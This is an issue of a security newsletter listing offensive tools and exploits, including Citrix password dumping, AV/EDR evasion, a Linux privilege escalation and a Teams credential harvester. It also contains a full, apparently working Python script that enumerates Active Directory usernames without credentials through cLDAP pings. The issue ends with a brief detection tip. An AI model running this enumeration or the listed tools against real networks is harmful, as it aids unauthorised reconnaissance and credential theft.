Last Week in Security (LWiS) - 2022-09-19

CloudFox (@sethsec + @cvendramini2), MiraclePtr in Chrome, Jetty hacking (@m1ke_n1), ExternalC2 myths (@RET2_pwn), NTLMv1 attacks (@n00py1 + @an0n_r0), Golden Ticket patches soon (@varonis), plaintext Citrix passwords (@gentilkiwi), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2022-09-05 to 2022-09-19.

News

Techniques and Write-ups

Tools and Exploits

  • Mimikatz update. Now you can dump plaintext Citrix passwords from memory. Best part is you don't even need elevated rights for the current user context! If anyone has this as a BOF, DM me!
  • ldapnomnom - Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP).
  • CVE-2022-37706-LPE-exploit - A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04) - NOTE: only for the Enlightenment window manager (Tizen based TVs and... that's it?).
  • MasqueradingPEB - Masquerade any legitimate Windows binary by changing some fields in the PEB structure.
  • CVE North Stars - Leveraging CVEs as North Stars in vulnerability discovery and comprehension.
  • ExecRemoteAssembly - Execute Remote Assembly with args passing and with AMSI and ETW patching.
  • Teamsniper is a tool for fetching keywords (passwords, emails, database, etc.) from Microsoft Teams.
  • DylibHijackTest - Discover DYLD_INSERT_LIBRARIES hijacks on macOS.
  • Codecepticon is a .NET application that allows you to obfuscate C#, VBA/VB6 (macros), and PowerShell source code, and is developed for offensive security engagements such as Red/Purple Teams. What separates Codecepticon from other obfuscators is that it targets the source code rather than the compiled executables, and was developed specifically for AV/EDR evasion.
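To make the ldapnomnom item above concrete, here is an added illustration of the LDAP Ping probe it abuses. This is example code written for this post, not ldapnomnom's own implementation. The wire format (a connectionless LDAP SearchRequest on UDP/389 with a filter on NtVer, AAC and User, returning a Netlogon attribute whose first little-endian word is an opcode) follows MS-ADTS; the specific NtVer=0x06 and AAC=0x10 values and the opcode constants are my assumptions from that spec, the DC address and usernames are placeholders, and fake_dc_reply is a constructed sample so the parser can be exercised offline.

```python
"""Unauthenticated cLDAP "LDAP Ping" username probe (added example, not ldapnomnom's code)."""
import socket
import struct

# Netlogon response opcodes (MS-ADTS 6.3.1.3); assumed values.
LOGON_SAM_LOGON_RESPONSE = 0x13       # account exists (non-EX format)
LOGON_SAM_USER_UNKNOWN = 0x15         # account unknown (non-EX format)
LOGON_SAM_LOGON_RESPONSE_EX = 0x17    # account exists (EX format)
LOGON_SAM_USER_UNKNOWN_EX = 0x19      # account unknown (EX format)
NTVER_5_AND_5EX = 0x06                # assumption: ask for the _EX response layout
AAC_NORMAL_ACCOUNT = 0x10             # assumption: USER_NORMAL_ACCOUNT in SAM encoding


def ber(tag: int, payload: bytes) -> bytes:
    """Encode one BER TLV with a definite length (long form above 127 bytes)."""
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + payload


def ber_int(n: int) -> bytes:
    """BER INTEGER for a non-negative n (extra leading byte keeps the sign bit clear)."""
    return ber(0x02, n.to_bytes(n.bit_length() // 8 + 1, "big"))


def build_cldap_ping(msg_id: int, username: str) -> bytes:
    """LDAPMessage{SearchRequest} on rootDSE with (&(NtVer=..)(AAC=..)(User=name)), attrs=[Netlogon]."""
    def eq(attr: bytes, value: bytes) -> bytes:
        return ber(0xA3, ber(0x04, attr) + ber(0x04, value))          # equalityMatch [3]
    filt = ber(0xA0,                                                  # and [0]
               eq(b"NtVer", struct.pack("<I", NTVER_5_AND_5EX))
               + eq(b"AAC", struct.pack("<I", AAC_NORMAL_ACCOUNT))
               + eq(b"User", username.encode()))
    search = ber(0x63,                                                # SearchRequest [APPLICATION 3]
                 ber(0x04, b"")                                       # baseObject: rootDSE
                 + ber(0x0A, b"\x00") + ber(0x0A, b"\x00")            # scope base, never deref
                 + ber_int(0) + ber_int(0)                            # sizeLimit, timeLimit
                 + ber(0x01, b"\x00")                                 # typesOnly FALSE
                 + filt
                 + ber(0x30, ber(0x04, b"Netlogon")))                 # requested attributes
    return ber(0x30, ber_int(msg_id) + search)


def ber_iter(buf: bytes):
    """Yield (tag, value) for each TLV laid out back to back in buf."""
    pos = 0
    while pos + 2 <= len(buf):
        tag, n = buf[pos], buf[pos + 1]
        pos += 2
        if n & 0x80:                                   # long-form length
            k = n & 0x7F
            n = int.from_bytes(buf[pos:pos + k], "big")
            pos += k
        yield tag, buf[pos:pos + n]
        pos += n


def find_netlogon_blob(datagram: bytes):
    """Descend the reply until a PartialAttribute {type="Netlogon", vals SET} is found."""
    stack = [datagram]
    while stack:
        items = list(ber_iter(stack.pop()))
        if len(items) == 2 and items[0] == (0x04, b"Netlogon") and items[1][0] == 0x31:
            vals = list(ber_iter(items[1][1]))
            return vals[0][1] if vals else None
        stack.extend(value for tag, value in items if tag & 0x20)    # constructed types only
    return None


def netlogon_user_exists(blob: bytes) -> bool:
    """Interpret the opcode in the first two bytes of the Netlogon attribute."""
    opcode = struct.unpack_from("<H", blob, 0)[0]
    if opcode in (LOGON_SAM_LOGON_RESPONSE, LOGON_SAM_LOGON_RESPONSE_EX):
        return True
    if opcode in (LOGON_SAM_USER_UNKNOWN, LOGON_SAM_USER_UNKNOWN_EX):
        return False
    raise ValueError(f"unexpected Netlogon opcode 0x{opcode:x}")


def cldap_ping(dc_ip: str, username: str, timeout: float = 2.0) -> bool:
    """Send one probe to a DC (placeholder address) and report whether the account exists."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_cldap_ping(1, username), (dc_ip, 389))
        data, _ = s.recvfrom(65535)
    blob = find_netlogon_blob(data)
    if blob is None:
        raise ValueError("no Netlogon attribute in reply")
    return netlogon_user_exists(blob)


def fake_dc_reply(msg_id: int, opcode: int) -> bytes:
    """Constructed sample datagram shaped like a DC reply (SearchResultEntry + SearchResultDone)."""
    blob = struct.pack("<HHI", opcode, 0, 0) + b"\x00" * 16            # opcode, sbz, flags, guid
    attr = ber(0x30, ber(0x04, b"Netlogon") + ber(0x31, ber(0x04, blob)))
    entry = ber(0x64, ber(0x04, b"") + ber(0x30, attr))
    done = ber(0x65, ber(0x0A, b"\x00") + ber(0x04, b"") + ber(0x04, b""))
    return ber(0x30, ber_int(msg_id) + entry) + ber(0x30, ber_int(msg_id) + done)


if __name__ == "__main__":
    for name in ("administrator", "nobody.here"):          # placeholder names and DC address
        print(name, cldap_ping("192.0.2.10", name))
```

The whole exchange is one UDP datagram each way and needs no credentials, which is what makes it a quiet enumeration primitive; on the defensive side, bursts of UDP/389 requests carrying User= filters from a single source are the thing to alert on.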

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.